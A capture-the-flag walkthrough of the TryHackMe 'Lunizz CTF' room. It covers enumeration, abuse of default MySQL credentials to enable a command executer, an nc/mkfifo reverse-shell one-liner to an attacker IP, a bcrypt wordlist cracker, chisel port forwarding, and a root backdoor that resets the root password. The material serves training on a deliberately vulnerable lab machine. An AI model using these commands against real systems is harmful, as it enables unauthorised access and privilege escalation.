Lunizz CTF - TryHackMe

This is a write-up for another TryHackMe room, "Lunizz CTF". The room is available here:
As always, let's start by enumerating the target to find out which services are running on it.
Enumeration
NMAP
# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.190.71
┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.190.71
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 16:34 EST
Nmap scan report for 10.10.190.71
Host is up (0.024s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
4444/tcp open  krb524
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,80,3306,4444,5000 10.10.190.71
┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -O -A -Pn -T4 -p22,80,3306,4444,5000 10.10.190.71
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 16:38 EST
Nmap scan report for 10.10.190.71
Host is up (0.056s latency).

PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f8:08:db:be:ed:80:d1:ef:a4:b0:a9:e8:2d:e2:dc:ee (RSA)
| 256 79:01:d6:df:8b:0a:6e:ad:b7:d8:59:9a:94:0a:09:7a (ECDSA)
|_ 256 b1:a9:ef:bb:7e:5b:01:cd:4c:8e:6b:bf:56:5d:a7:f4 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL 5.7.32-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.7.32-0ubuntu0.18.04.1
| Thread ID: 4
| Capabilities flags: 65535
| Some Capabilities: ODBCClient, Support41Auth, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongPassword, SupportsTransactions, LongColumnFlag, IgnoreSigpipes, SwitchToSSLAfterHandshake, SupportsCompression, FoundRows, InteractiveClient, Speaks41ProtocolNew, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: iM\x08P=\x1A "M}K^\x16jnU\x1Cv\x10]
|_ Auth Plugin Name: mysql_native_password
| ssl-cert: Subject: commonName=MySQL_Server_5.7.32_Auto_Generated_Server_Certificate
| Not valid before: 2020-12-10T19:29:01
|_Not valid after: 2030-12-08T19:29:01
|_ssl-date: TLS randomness does not represent time
4444/tcp open krb524?
| fingerprint-strings:
| GetRequest:
| Can you decode this for me?
| cmFuZG9tcGFzc3dvcmQ=
| Wrong Password
| NULL:
| Can you decode this for me?
| cmFuZG9tcGFzc3dvcmQ=
| SSLSessionReq:
| Can you decode this for me?
|_ ZXh0cmVtZXNlY3VyZXJvb3RwYXNzd29yZA==
5000/tcp open upnp?
| fingerprint-strings:
| DNSStatusRequestTCP, FourOhFourRequest, GenericLines, Kerberos, LDAPSearchReq, NULL, NotesRPC, RPCCheck, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe, giop, oracle-tns:
| OpenSSH 5.1
|_ Unable to load config info from /usr/local/ssl/openssl.cnf
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port4444-TCP:V=7.91%I=7%D=2/24%Time=6036C75F%P=x86_64-pc-linux-gnu%r(NU
SF:LL,31,"Can\x20you\x20decode\x20this\x20for\x20me\?\ncmFuZG9tcGFzc3dvcmQ
SF:=\n")%r(GetRequest,3F,"Can\x20you\x20decode\x20this\x20for\x20me\?\ncmF
SF:uZG9tcGFzc3dvcmQ=\nWrong\x20Password")%r(SSLSessionReq,41,"Can\x20you\x
SF:20decode\x20this\x20for\x20me\?\nZXh0cmVtZXNlY3VyZXJvb3RwYXNzd29yZA==\n
SF:");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5000-TCP:V=7.91%I=7%D=2/24%Time=6036C759%P=x86_64-pc-linux-gnu%r(NU
SF:LL,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x20info\x20from\
SF:x20/usr/local/ssl/openssl\.cnf")%r(GenericLines,46,"OpenSSH\x205\.1\nUn
SF:able\x20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/openssl\
SF:.cnf")%r(SMBProgNeg,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config
SF:\x20info\x20from\x20/usr/local/ssl/openssl\.cnf")%r(RPCCheck,46,"OpenSS
SF:H\x205\.1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/usr/local
SF:/ssl/openssl\.cnf")%r(DNSStatusRequestTCP,46,"OpenSSH\x205\.1\nUnable\x
SF:20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/openssl\.cnf")
SF:%r(SSLSessionReq,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x2
SF:0info\x20from\x20/usr/local/ssl/openssl\.cnf")%r(TerminalServerCookie,4
SF:6,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/
SF:usr/local/ssl/openssl\.cnf")%r(TLSSessionReq,46,"OpenSSH\x205\.1\nUnabl
SF:e\x20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/openssl\.cn
SF:f")%r(Kerberos,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x20i
SF:nfo\x20from\x20/usr/local/ssl/openssl\.cnf")%r(X11Probe,46,"OpenSSH\x20
SF:5\.1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/
SF:openssl\.cnf")%r(FourOhFourRequest,46,"OpenSSH\x205\.1\nUnable\x20to\x2
SF:0load\x20config\x20info\x20from\x20/usr/local/ssl/openssl\.cnf")%r(LDAP
SF:SearchReq,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20config\x20info\x
SF:20from\x20/usr/local/ssl/openssl\.cnf")%r(SIPOptions,46,"OpenSSH\x205\.
SF:1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/usr/local/ssl/ope
SF:nssl\.cnf")%r(NotesRPC,46,"OpenSSH\x205\.1\nUnable\x20to\x20load\x20con
SF:fig\x20info\x20from\x20/usr/local/ssl/openssl\.cnf")%r(oracle-tns,46,"O
SF:penSSH\x205\.1\nUnable\x20to\x20load\x20config\x20info\x20from\x20/usr/
SF:local/ssl/openssl\.cnf")%r(giop,46,"OpenSSH\x205\.1\nUnable\x20to\x20lo
SF:ad\x20config\x20info\x20from\x20/usr/local/ssl/openssl\.cnf");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   22.04 ms 10.8.0.1
2   22.81 ms 10.10.190.71

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds
Port 22 runs OpenSSH 7.6p1, the stock Ubuntu 18.04 package, and offers no obvious way in on its own. Port 80 serves the Apache default page; we will dig into it in the next section. MySQL 5.7.32 is exposed on port 3306, which is unusual for an internet-facing host and worth returning to once we have credentials. Port 4444 answers every probe with "Can you decode this for me?" followed by a base64 string; two different strings appear across the probes, and they decode to "randompassword" (cmFuZG9tcGFzc3dvcmQ=) and "extremesecurerootpassword" (ZXh0cmVtZXNlY3VyZXJvb3RwYXNzd29yZA==). Keep both in mind for later. Port 5000 returns the text "OpenSSH 5.1" plus an OpenSSL configuration error to every probe, including non-SSH ones; that is a banner string rather than a real SSH handshake, so treat the "very old SSH" claim with suspicion. We will come back to both of these.
Directory Brute Forcing with FFUF
Port 80 is open, so let's brute-force the directories and files the web server exposes with ffuf:
ffuf -u http://10.10.190.71/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://10.10.190.71/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.1
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.190.71/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .html .php .txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

index.php               [Status: 200, Size: 10917, Words: 3499, Lines: 375]
instructions.txt        [Status: 200, Size: 338, Words: 39, Lines: 13]
hidden                  [Status: 301, Size: 313, Words: 20, Lines: 10]
whatever                [Status: 301, Size: 315, Words: 20, Lines: 10]
.html                   [Status: 403, Size: 277, Words: 20, Lines: 10]
                        [Status: 200, Size: 10917, Words: 3499, Lines: 375]
.php                    [Status: 403, Size: 277, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 475 req/sec :: Duration: [0:18:17] :: Errors: 0 ::
A few of these results are interesting. The "whatever" directory is a page that claims to run commands on the server, but the mode currently looks disabled:

What is the default password for mysql?
The ffuf scan also found a file named "instructions.txt", so open it in a browser:

It gives us a MySQL user and its default password. Connect to the database with them:
mysql -u runcheck -h 10.10.20.133 -p

We can connect. Explore the database with the following commands:
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| runornot           |
+--------------------+
2 rows in set (0.019 sec)

MySQL [(none)]> use runornot;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [runornot]> show tables;
+--------------------+
| Tables_in_runornot |
+--------------------+
| runcheck           |
+--------------------+
1 row in set (0.019 sec)

MySQL [runornot]> select * from runcheck;
+------------+
| [REDACTED] |
+------------+
|          0 |
+------------+
1 row in set (0.028 sec)

MySQL [runornot]>
The command page itself hints at this: "I can't run commands, there must be a mysql column that controls command executer".
The single column in the "runcheck" table (its name is redacted here because it is one of the room's answers) is that switch, and its value is currently 0. Since the default credentials give us write access, set it to 1 and check whether the executer comes alive:
MySQL [runornot]> UPDATE runcheck SET [REDACTED] = 1;
Query OK, 1 row affected (0.030 sec)
Rows matched: 1  Changed: 1  Warnings: 0

MySQL [runornot]> select * from runcheck;
+------------+
| [REDACTED] |
+------------+
|          1 |
+------------+
1 row in set (0.018 sec)

MySQL [runornot]>
With the flag updated, check whether the page now executes commands:

Indeed we can!
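To make the design flaw concrete, here is an added example (my own code, not the box's PHP and not part of the original write-up) that models the same gate with an in-memory SQLite database: a web "command executer" consults a single flag row before handing a string to /bin/sh, and an attacker who holds the database credentials published in instructions.txt simply flips that row. The real column name is redacted in the write-up, so `run_enabled` is a made-up stand-in, and the one-row `runcheck` table is constructed here to mirror what `select * from runcheck;` showed.

```python
import sqlite3
import subprocess

# Constructed stand-in for the box's `runornot` database: one table, one
# row, one integer flag. `run_enabled` is a hypothetical column name; the
# write-up redacts the real one.
SCHEMA = """
CREATE TABLE runcheck (run_enabled INTEGER NOT NULL);
INSERT INTO runcheck (run_enabled) VALUES (0);
"""

DISABLED_MSG = ("I can't run commands, there must be a mysql column "
                "that controls command executer")


def open_db() -> sqlite3.Connection:
    """Fresh in-memory database in the 'disabled' state (flag = 0)."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def execution_enabled(db: sqlite3.Connection) -> bool:
    """What the hidden page does on every request: read the flag row."""
    (flag,) = db.execute("SELECT run_enabled FROM runcheck").fetchone()
    return flag == 1


def run_command(db: sqlite3.Connection, cmd: str) -> str:
    """The 'command executer' as observed on the box.

    The only control is the database flag. When it is set, the user-supplied
    string goes to a shell unchanged, which is exactly why the reverse-shell
    one-liner later in the write-up (pipes, redirects, mkfifo) works.
    """
    if not execution_enabled(db):
        return DISABLED_MSG
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout + proc.stderr


def attacker_enable(db: sqlite3.Connection) -> None:
    """Same statement the write-up issues over the MySQL connection.

    The credentials came from a world-readable instructions.txt, so the
    'disabled mode' is a soft switch the attacker controls, not a control.
    """
    db.execute("UPDATE runcheck SET run_enabled = 1")
    db.commit()


if __name__ == "__main__":
    db = open_db()
    print(run_command(db, "id"))          # refused: flag is 0
    attacker_enable(db)
    print(run_command(db, "id"))          # runs: flag is now 1
```

The lesson is not the flag itself but who can write it: a feature toggle is only as strong as the weakest principal with UPDATE on its table, and here that principal is anyone who read instructions.txt. A remote command executer should not exist at all; failing that, the web application's database account should be distinct from any published one and limited to SELECT.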
a folder shouldn’t be…
Run "ls -lrt /" from the executer. One directory in the listing does not belong on a stock Ubuntu install; its name answers this question, and we return to it in the privilege escalation section.

Reverse Shell
The executer also gives us a reverse shell. Start a netcat listener on the attacking machine (nc -lvnp 9999, matching the port in the one-liner), then run the following from the executer:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 9999 >/tmp/f
And we get the shell:

Upgrade Shell
Upgrade and stabilise the shell with the usual sequence:
/usr/bin/script -qc /bin/bash /dev/null
(press Ctrl+Z to background the shell)
stty raw -echo
fg
export TERM=xterm
Privilege Escalation
Transfer linpeas.sh to the target and run it. It shows something listening on internal port 8080:

It also finds the directory /var/backups/.scripts, which holds the scripts behind ports 4444 and 5000; both turn out to be rabbit holes.


The /proct directory we found earlier, also highlighted by LinPEAS, contains a Python file:
www-data@lunizz:/$ cat /proct/pass/bcrypt_encryption.py
import bcrypt
import base64

password = # https://www.youtube.com/watch?v=-tJYN-eG1zk&ab_channel=QueenOfficial
bpass = password.encode('ascii')
passed= str(base64.b64encode(bpass))
hashAndSalt = bcrypt.hashpw(passed.encode(), bcrypt.gensalt())
print(hashAndSalt)

salt = b'$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6'
# I wrote this code last year and i didnt save password verify line... I need to find my password
The YouTube link hints that the password is a well-known phrase likely to be in rockyou.txt, and the code shows the stored value is a bcrypt hash. So the first attempt is john the ripper:
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
where hash.txt contains the hash. This does not crack it, and the script explains why: the value that was hashed is not the password but str(base64.b64encode(password.encode('ascii'))), and str() of a bytes object in Python 3 is its repr, so what actually went into bcrypt is the literal text b'<base64 of the password>', including the b prefix and both quotes. john is testing the raw words.
So we reuse the script's own logic instead: for each rockyou candidate, apply the same base64-and-repr transformation, bcrypt it and compare against the stored hash. (The variable the script calls "salt" is in fact the complete bcrypt string: $2b$, the cost 12, the 22-character salt and the 31-character digest. bcrypt reads the salt out of it, and the comparison is against the whole string.)
This takes a long time, since cost factor 12 makes every guess slow, and a naive version aborts on some rockyou entries because they contain non-ASCII bytes that .encode('ascii') refuses. One workaround is to delete those lines, and the ones already tested, from the wordlist as you hit them.
[**UPDATE**]
Per the Python docs, passing errors='ignore' to the .encode('ascii') call in the cracking script discards the characters that cannot be encoded, so there is no need to edit rockyou.txt. This is safe here because the original script could never have hashed a non-ASCII password in the first place.
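The cracker described above, written out as an added example (my own code, not the script from the box and not the author's script from the write-up), with the errors='ignore' fix from the update folded in. It assumes the bcrypt package (pip install bcrypt) and a rockyou.txt path; the only thing taken from the page is the hash constant.

```python
"""Offline cracker for the hash left in /proct/pass/bcrypt_encryption.py.

The script on the box hashes str(base64.b64encode(password.encode('ascii'))),
and str() of a bytes object is its repr, so the text that went into bcrypt is
    b'<base64 of password>'
with the leading b and both quotes. Every candidate must be transformed the
same way before it is compared, which is why john on the raw wordlist fails.
"""
import base64

# The variable the original script calls "salt" is the full bcrypt string
# (copied from the write-up): $2b$ + cost 12 + 22-char salt + 31-char digest.
# bcrypt.checkpw() takes it whole and extracts the salt itself.
TARGET_HASH = b'$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6'


def encode_candidate(password: str) -> bytes:
    """Apply exactly the transformation bcrypt_encryption.py applies.

    errors='ignore' is the [UPDATE] fix: rockyou contains non-ASCII entries,
    and without it .encode('ascii') raises UnicodeEncodeError mid-run. The
    original script had no handler, so the real password is pure ASCII and
    dropping stray characters cannot hide it.
    """
    b64 = base64.b64encode(password.encode('ascii', errors='ignore'))
    return str(b64).encode()      # str(bytes) is the repr: b"b'...'"


def check(password: str, target: bytes = TARGET_HASH) -> bool:
    """True if `password`, transformed like the script does, matches `target`."""
    import bcrypt  # imported lazily so encode_candidate() works without it
    return bcrypt.checkpw(encode_candidate(password), target)


def crack(wordlist_path: str, target: bytes = TARGET_HASH, limit: int = None):
    """Walk a wordlist and return the first matching password, or None.

    The file is opened as latin-1 so that no line can fail to decode (rockyou
    is not valid UTF-8 throughout). Cost 12 makes each guess slow; `limit`
    lets you test a prefix of the list or resume in chunks.
    """
    with open(wordlist_path, encoding='latin-1') as fh:
        for n, line in enumerate(fh):
            if limit is not None and n >= limit:
                break
            word = line.rstrip('\r\n')
            if check(word, target):
                return word
    return None


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else '/usr/share/wordlists/rockyou.txt'
    print(crack(path))
```

Run it as python3 crack.py /usr/share/wordlists/rockyou.txt. The point worth remembering is the transformation step: whenever a custom script wraps a password before hashing (encoding, repr, prefixing, truncating), a generic cracker has to be fed the wrapped form or it will never match, however good the wordlist.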
hi adam, do you remember our place?
The file /proct/pass/bcrypt_encryption.py is owned by the user "adam", so switch to adam with the cracked password. Exploring adam's home directory turns up a note with the hint for mason's password:
adam@lunizz:~$ cat /home/adam/Desktop/.archive/to_my_best_friend_adam.txt
do you remember our place
i love there it's soo calming
i will make that lights my password--https://www.google.com/maps/@68.5090469,27.481808,3a,75y,313.8h,103.6t/data=!3m6!1e1!3m4!1skJPO1zlKRtMAAAQZLDcQIQ!3e2!7i10000!8i5000
adam@lunizz:~$
Open the link: the lights visible at that spot are the password.
user.txt
Switch to the user "mason" with the new password; user.txt is in mason's home directory:

root.txt
LinPEAS showed something listening on internal port 8080. We can forward that port to our Kali machine and reach it from there; chisel does the forwarding:
On Kali run chisel as server:
./chisel server -p 9000 --reverse -v

On Target run chisel as a client:
./chisel client 10.8.98.192:9000 R:10.8.98.192:8080:127.0.0.1:8080

The chisel client on the target connects back to the chisel server on Kali (port 9000). The R: prefix makes it a reverse forward: the server listens on the Kali side (10.8.98.192:8080 in my case) and relays whatever arrives there to 127.0.0.1:8080 on the target.
Browsing to http://10.8.98.192:8080 from Kali shows "Mason's Root Backdoor":

Intercepting the request in Burp shows that the page is a PHP form and that, per the text above, the backdoor expects a password and a command type. Following the example linked here, a request can be sent to the target like this:
Send the request from the command line with the PHP script above:

The backdoor wants mason's password, so send the request again with it and with lsla as the command type:

That works: the response is the file listing of the root directory. Now send the request with passwd as the command type:

This resets the root user's password. Switch to root with the new password:

That works too, and the root flag is at /root/root.txt.
That’s it.